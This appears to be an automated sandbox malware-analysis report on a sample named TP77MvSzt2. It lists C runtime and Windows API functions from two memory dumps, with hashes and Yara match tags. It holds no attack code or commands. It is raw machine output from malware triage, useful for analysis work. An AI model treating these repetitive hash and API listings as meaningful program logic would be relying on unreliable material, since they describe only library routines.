                                                                                  • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                  • Instruction ID: b1afa3ff35589a55914ce993ba866f705f8f551168ca6a2efa5445298634ce1b
                                                                                  • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                  • Instruction Fuzzy Hash: DA110631605229BFEB202F7AAC44D6B7A9CEF86765B100F24FE16C7250DA74E900D6A1
                                                                                  Function 0043A3A3 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                                                  • _free.LIBCMT ref: 0043A3F1
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 0043A3FC
                                                                                  • _free.LIBCMT ref: 0043A407
                                                                                  • _free.LIBCMT ref: 0043A45B
                                                                                  • _free.LIBCMT ref: 0043A466
                                                                                  • _free.LIBCMT ref: 0043A471
                                                                                  • _free.LIBCMT ref: 0043A47C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                                                  Function 0486A60A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0486A351: _free.LIBCMT ref: 0486A37A
                                                                                  • _free.LIBCMT ref: 0486A658
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486A663
                                                                                  • _free.LIBCMT ref: 0486A66E
                                                                                  • _free.LIBCMT ref: 0486A6C2
                                                                                  • _free.LIBCMT ref: 0486A6CD
                                                                                  • _free.LIBCMT ref: 0486A6D8
                                                                                  • _free.LIBCMT ref: 0486A6E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction ID: dbce35dcdf86dd0971630514a4eea0838b63cfde4ef3e34c21a0118b09b364e3
                                                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction Fuzzy Hash: AF11E171440B04ABEAA1BBBDCC46FCB779DEF01344F440E18B29BF6150DAE2F0104622
                                                                                  Function 00412412 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412420
                                                                                  • GetLastError.KERNEL32 ref: 00412426
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412453
                                                                                  • GetLastError.KERNEL32 ref: 0041245D
                                                                                  • GetLastError.KERNEL32 ref: 0041246F
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID:
                                                                                  • API String ID: 4227777306-0
                                                                                  • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                                                  • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                                                  • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                                                  • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                                                  Function 04842679 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 04842687
                                                                                  • GetLastError.KERNEL32 ref: 0484268D
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 048426BA
                                                                                  • GetLastError.KERNEL32 ref: 048426C4
                                                                                  • GetLastError.KERNEL32 ref: 048426D6
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048426EC
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048426FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID:
                                                                                  • API String ID: 4227777306-0
                                                                                  • Opcode ID: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                                                  • Instruction ID: 82509892218979575461b7daff8477d3c7cb89d8b5b38a62f34be7e0dd1e9d8e
                                                                                  • Opcode Fuzzy Hash: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                                                  • Instruction Fuzzy Hash: 0F01F73460411DA7EB10BF65EC48BAF3768EF82AD6B500E66F405E3060EB64F50497A9
                                                                                  Function 048424C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0484672B), ref: 048424D6
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 048424E4
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 048424F2
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0484672B), ref: 04842520
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 04842527
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 04842542
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 0484254E
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04842564
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID: kernel32.dll
                                                                                  • API String ID: 4179531150-1793498882
                                                                                  • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                  • Instruction ID: d2ccf1c1577a0dbbd7a7c197948702cc814c5e56003dc1a623e7c677e6d030e1
                                                                                  • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                  • Instruction Fuzzy Hash: 90F0F4769043103FF6107B797C8992A7FACDD86A633210B76F811D22E1EF74D540866C
                                                                                  Function 0042FF04 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: 11@$CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-3445089953
                                                                                  • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                                                  • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                                                  • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                                                  • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                                                  Function 048623BB Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0486260C,00000001,00000001,?), ref: 04862415
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0486260C,00000001,00000001,?,?,?,?), ref: 0486249B
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04862595
                                                                                  • __freea.LIBCMT ref: 048625A2
                                                                                    • Part of subcall function 0486392E: RtlAllocateHeap.NTDLL(00000000,0483DAFC,00000000), ref: 04863960
                                                                                  • __freea.LIBCMT ref: 048625AB
                                                                                  • __freea.LIBCMT ref: 048625D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1414292761-0
                                                                                  • Opcode ID: 51f373b7acc2851bdc3dd9d03c9e40d3ec423ff86316042841f40984be93ade7
                                                                                  • Instruction ID: 7660c76a44a2c8fec8a5b9e08d7d38eeba9444a622a03b9e49a5e58277fd62e7
                                                                                  • Opcode Fuzzy Hash: 51f373b7acc2851bdc3dd9d03c9e40d3ec423ff86316042841f40984be93ade7
                                                                                  • Instruction Fuzzy Hash: 48513472610206AFEBB4AF28CC95EAF77AAEB40754F144BE8FD06D6040EB74E840C751
                                                                                  Function 0485E439 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __cftoe
                                                                                  • String ID:
                                                                                  • API String ID: 4189289331-0
                                                                                  • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                  • Instruction ID: 3fd2401633ff3c48e385cf4babe0fb42190b579df41d288730e4579a5643330b
                                                                                  • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                  • Instruction Fuzzy Hash: EC511772900605ABEB249F6CCC81FBE77E9AF49364F104B19EC19D61A1EB71F600C665
                                                                                  Function 0483545C Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                  • String ID:
                                                                                  • API String ID: 1687354797-0
                                                                                  • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                  • Instruction ID: f5eddfdf6787db06b204784323e0d9cdd2b76d569b153cfeab631d1c4a905f5a
                                                                                  • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                  • Instruction Fuzzy Hash: 68219971C04248AAEF15ABACD8447DE77F89F0931AF144A19D500F7240DBB5B644C7A6
                                                                                  Function 00428DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,FE93531E), ref: 00428E08
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
                                                                                  • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,FE93531E), ref: 00428E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction ID: 13d4ce3fadb6930e01a7802674f608048713f2fc9b33e2444f23e675ffd4a1be
                                                                                  • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction Fuzzy Hash: 7301D43230AB316EA6242BF67C8956F2744EB1577ABA1033FF510D12F1EE698C21954E
                                                                                  Function 04859061 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,04859058,048569E9,04870927,00000008,04870C8C,?,?,?,?,04853CD2,?,?,0045A064), ref: 0485906F
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0485907D
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04859096
                                                                                  • SetLastError.KERNEL32(00000000,?,04859058,048569E9,04870927,00000008,04870C8C,?,?,?,?,04853CD2,?,?,0045A064), ref: 048590E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction ID: fd54cc55adcd6ce401347e6eb75b20b6fa11388bfbec9f8b7cfd8e1ae4c3cb0b
                                                                                  • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction Fuzzy Hash: 3101FC72209B11AEB7283BB87C899272748EB0567AB200F39ED20C11F1EF9268515595
                                                                                  Function 00404D77 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                                                  • int.LIBCPMT ref: 00404D9F
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                                                  • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                                                  • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                                                  Function 04834FDE Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 04834FEF
                                                                                  • int.LIBCPMT ref: 04835006
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0483BFF9
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0483C013
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0483500F
                                                                                  • std::_Facet_Register.LIBCPMT ref: 04835040
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 04835056
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04835074
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction ID: d41f09cc3eb551b60eed3cd8977a9394391745cbf7e8befd490ce15aa882cc3a
                                                                                  • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction Fuzzy Hash: E811A032900218ABEB25FFA8C810AED7770AF4071AF144E19E911F72D0DBB5BA0487D2
                                                                                  Function 0040C1AE Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                                                  • int.LIBCPMT ref: 0040C1D6
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                                                  • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                                                  Function 004054F7 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                                                  • int.LIBCPMT ref: 0040551F
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                                                  • std::_Facet_Register.LIBCPMT ref: 00405559
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                  • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                                                  • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                  • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                                                  Function 00405593 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                                                  • int.LIBCPMT ref: 004055BB
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                                                  • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                  • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                                                  • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                  • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                                                  Function 00404C39 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                                                  • int.LIBCPMT ref: 00404C61
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                                                  • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                                                  Function 0483C415 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0483C426
                                                                                  • int.LIBCPMT ref: 0483C43D
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0483BFF9
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0483C013
